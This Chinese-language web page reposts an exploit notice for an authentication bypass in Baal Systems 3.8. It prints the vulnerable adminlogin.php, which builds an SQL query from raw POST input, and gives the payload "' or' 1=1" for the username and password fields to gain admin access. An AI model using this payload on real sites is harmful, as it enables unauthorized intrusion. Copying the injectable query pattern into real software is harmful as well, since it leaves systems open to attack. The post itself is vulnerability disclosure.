Baal Systems = 3.8 (Auth Bypass) 后台万能登入漏洞

阅读: 评论:0

Baal Systems = 3.8 (Auth Bypass) 后台万能登入漏洞

Baal Systems = 3.8 (Auth Bypass) 后台万能登入漏洞

漏洞文件:adminlogin.php 代码: <?php 
include("common.php"); 
if (!empty($_POST['password'])) { 
    $username = $_POST['username']; 
    $password = $_POST['password']; 
 
    $query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';"; 
    $result1 = db_query($query); 
    $rows = db_num_rows($result1); 
    $row = db_fetch_array($result1); 
    if ($rows != 0) { 
        if (session_is_registered("whossession")) { 
            $_SESSION['who'] = "admin"; 
            $_SESSION['userrole'] = "admin"; 
            $_SESSION['username'] = $username; 
            $_SESSION['usernum'] = $row["userid"]; 
            header("location:admin.php"); 
        } else { 
            session_register("whossession"); 
            $_SESSION['who'] = "admin"; 
            $_SESSION['userrole'] = "admin"; 
            $_SESSION['username'] = $username; 
            $_SESSION['usernum'] = $row["userid"]; 
            header("location:admin.php"); 
        } 
    } else { 
        header("location:adminlogin.php?error=yes"); 
    } 
} else { 
 
    ?>  利用: url/adminlogin.php
 
username: ' or' 1=1 
Password: ' or' 1=1

本文发布于:2024-01-29 02:35:19,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170646692212083.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:登入   漏洞   后台   Systems   Baal
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23